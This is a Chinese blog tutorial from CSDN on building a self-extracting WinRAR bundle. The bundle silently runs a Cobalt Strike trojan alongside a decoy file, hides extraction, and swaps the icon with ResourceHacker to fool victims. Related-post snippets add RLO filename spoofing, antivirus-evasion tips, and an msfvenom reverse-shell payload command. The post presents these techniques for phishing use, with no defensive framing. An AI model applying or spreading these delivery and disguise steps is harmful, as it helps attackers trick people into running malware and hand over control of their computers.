自解压捆绑木马上线

已于 2022-04-30 12:39:58 修改
阅读量2.9k 收藏 28
点赞数 13
分类专栏: 网络钓鱼 文章标签: 安全
于 2022-04-05 17:11:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44747030/article/details/123972595
版权
本文介绍了如何使用特定工具创建一个自解压捆绑木马,通过将恶意软件与正常文件捆绑,实现双文件同时执行。在自解压过程中,木马文件被设置为隐藏模式,并通过修改图标来增加迷惑性。这种技术可能导致用户在不知情的情况下运行了恶意程序,从而影响系统安全。
摘要由CSDN通过智能技术生成

自解压捆绑木马

使用CS生成一个木马文件将木马跟一个正常的文件捆绑在一起,当点捆绑生成的EXE文件就会执行木马和正常的文件。

选中木马文件和一个正常的文件,选择添加到压缩文件

在这里插入图片描述

常规-勾选创建自解压格式压缩文件并修改压缩文件名

在这里插入图片描述

高级-点击自解压选项

在这里插入图片描述

常规-填写解压路径

在这里插入图片描述

设置-填写解压后运行的路径,一个为木马文件的名字一个为正常文件的名字。

在这里插入图片描述

模式-全部隐藏

在这里插入图片描述

更新-解压并更新文件-覆盖所有文件

在这里插入图片描述

最后点击确定,生成一个Desktop.exe的文件

这个文件的图标可以使用ResourceHacker进行修改

在这里插入图片描述

双击该exe文件,成功运行2个文件并上线

在这里插入图片描述

evilxpl
关注
专栏目录
吾爱EXE文件捆绑打包机(文件捆绑机)V18.8.18 免费版.rar
02-08
exe文件捆绑,来自网络
WinRAR捆绑图片,恶意程序并自动上线Cobalt Strike
最新发布
weixin_57176859的博客
07-10 451
CS:Cobalt Strike 一款以由美国redteam团队,研 发出来的一款以Metasploit为基础的GUI框架 式渗透测试工具。1、使用 Unicode 字符修改文件名后缀,右键 - 重命名 - 再次右键 - 插入Unicode - 控制字符 RLO。选择一张jpg格式的图片,选择512*512生成ico图标并生成。选中生成的ico图片和生成的木马——>添加到压缩文件。端口:在CS启动的时候可以看见端口号:50050。用户:为登录之后给别人看的名字,任意写。密码:为之前设置的密码,123。
【阿一网络安全】压缩文件木马制作
Ayixy的博客
07-04 186
解压文件选项 ②在安装选项卡里的安装选项卡下添加解压缩后运行的程序。将这三个添加到压缩文件,将名称改为正常的压缩包文件名。里面可以看到已经上线成功,拿到了这台机器的控制权了。文件 他会将我们正常的安装包和后门程序还有这个。下面这个路径不填默认就在当前目录下解压了。本机测试被火绒拦截了,需要做免杀。文件,然后需要将原本的图标替换掉。现在就已经替换好了,记得要保存。里建立了一个监听,监听端口为。是正常的压缩包和木马文件)(制作后门文件与监听)(捆绑压缩木马文件)
rar高级捆绑解压脚本命令
08-01
rar高级捆绑解压脚本命令rar高级捆绑解压脚本命令
利用Winrar自解压捆绑文件
cj_Hydra's Blog
02-15 2641
利用Winrar自解压捆绑文件 这篇文件没什么技术含量,也是无意间从自己看视频时学会的。 第一步:准备一个可执行木马文件,和一个flash安装文件 第二步:将这2个文件同时选择,然后右击,添加到压缩文件,选择创建自解压文件。 第三步:高级,自解压选项,设置解压后文件的存储路径 第四步:设置解压路径为C:\User(意思就是当用户点击了以后,文件会直接在c:\user生成),点击设置,解压后运...
利用自解压文件携带木马程序
weixin_45736806的博客
06-06 892
利用自解压文件携带木马程序 ** 可能会有不足,如果能告诉我哪里不对,我会非常开心。 **
安全研究》利用winrar压缩包工具创建自解压木马
1
11-03 519
在攻防演练中,钓鱼攻击通常采用社会工程学手段,通过伪装成可信的来源,引导用户点击恶意链接或下载恶意文件,进而实现攻击。而压缩包工具可以在一定程度上提高攻击成功率。具体来说,攻击者通常会将恶意文件打包成一个压缩包,然后利用一些诱人的话术诱导目标用户点击链接或下载该压缩包。当用户解压缩包时,其中包含的自解压木马就会被激活并感染用户的计算机,而在本篇文章中会介绍如何使用自解压木马技术钓鱼。
红队钓鱼技术之自解压钓鱼木马
xf555er的博客
08-07 902
对于使用自解压文件的场景,攻击者可以创建一个自解压的exe文件,该文件解压后自动执行解压出来的文件。然后,通过插入RLO字符,将这个exe文件伪装成另一种看似安全的文件类型,比如文本文件或图片文件。当用户打开这个看似安全的文件时,实际上是在运行恶意的exe文件RLO(Start of right-to-left override)是Unicode定义的一种特殊字符,其ASCII码为0x3F。这个字符被设计来兼容从右至左阅读的文字系统,如阿拉伯语。
钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS
weixin_45701675的博客
11-26 1881
钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS
MSF恶意程序利用+CS上线
dream2662583的博客
10-19 367
我是dream,我在新课程培训学习网安方面的知识,下面是关于msf恶意程序利用以及CS的内容。
渗透测试-木马免杀的几种方式
MSB_WLAQ的博客
09-28 4690
前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。 1、裸
exe捆绑工具
05-20
exe捆绑工具,可以把两个exe文件合并在一起,一个前台运行,一个后台运行
exe文件木马分离器
07-31
【exe文件木马分离器】是一种专门用于检测和提取捆绑在可执行文件(exe)中的恶意软件工具。在计算机安全领域,木马、恶意程序和插件常常通过伪装成正常程序来感染用户系统,给用户的隐私和数据安全带来严重威胁。...
MSF编码与upx加壳过杀软
悦分享
08-03 2368
本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件。
利用wnirar制作自解压捆绑软件
weixin_41038905的博客
08-10 553
步骤一:下载winrar软件 步骤二:填写自解压路径,windows推荐路径为:C:\Windows\TAPI 步骤三:填写自解压后要运行的程序 步骤四:生成程序 步骤五:使用Resourcehacker对步骤四生成的exe文件静态字眼进行修改,icon修改图标(使用icon格式图片,忽略报错,保存即可) ...
ATT&CK防御绕过-木马隐藏捆绑技术-winrar自解压和文件名反转
u013797594的博客
05-09 3119
ATT&CK防御绕过-木马隐藏和捆绑技术-winrar自解压和文件名反转
网络安全-解密WinRAR捆绑恶意程序并自动上线MSF的原理
xueshenlaila的博客
11-15 5388
文章目录生成伪装恶意程序的封面图标捆绑恶意程序和图片并设置自动运行使用Unicode字符修改文件名后缀通过访问图片自动获取目标shell 生成伪装恶意程序的封面图标 需要安装rar压缩工具。 WinRAR官网:http://www.winrar.com.cn/ 下载安装即可不需要特殊配置。 msfvenom生成exe ┌──(root????xuegod53)-[~] └─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53
rdp反向攻击利用总结
weixin_44747030的博客
11-19 823
rdp反向攻击
黑客必备利器:如何在系统上安装和使用 CobaltStrike(简称:CS
热门推荐
weixin_43263566的博客
01-11 2万+
渗透测试之基本的攻击流程
捆绑木马和不捆绑有什么区别
02-15
捆绑木马和不捆绑木马是两种不同的恶意软件形式。 1. 捆绑木马(Binder Trojan)是一种恶意软件,它将恶意代码绑定到合法的应用程序或文件中。当用户运行这个被捆绑的应用程序或文件时,恶意代码也会被执行。捆绑木马的目的是隐藏恶意代码,使其看起来像是合法的应用程序或文件,从而欺骗用户并绕过安全防护机制。 2. 不捆绑木马(Non-binder Trojan)是一种独立的恶意软件,它不需要将自身绑定到其他应用程序或文件中。不捆绑木马可以通过各种方式传播,例如通过电子邮件附件、下载链接、恶意网站等。一旦用户执行了不捆绑木马,它就会开始执行恶意操作,例如窃取用户信息、破坏系统、传播其他恶意软件等。 区别: - 捆绑木马需要将自身绑定到其他应用程序或文件中,以隐藏恶意代码;而不捆绑木马是独立的恶意软件。 - 捆绑木马的传播方式通常是通过共享软件、下载站点等途径,用户可能会在不知情的情况下运行恶意代码;而不捆绑木马可以通过多种方式传播,包括电子邮件、下载链接等。 - 捆绑木马的目的是欺骗用户并绕过安全防护机制,而不捆绑木马的目的可以是窃取信息、破坏系统等。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值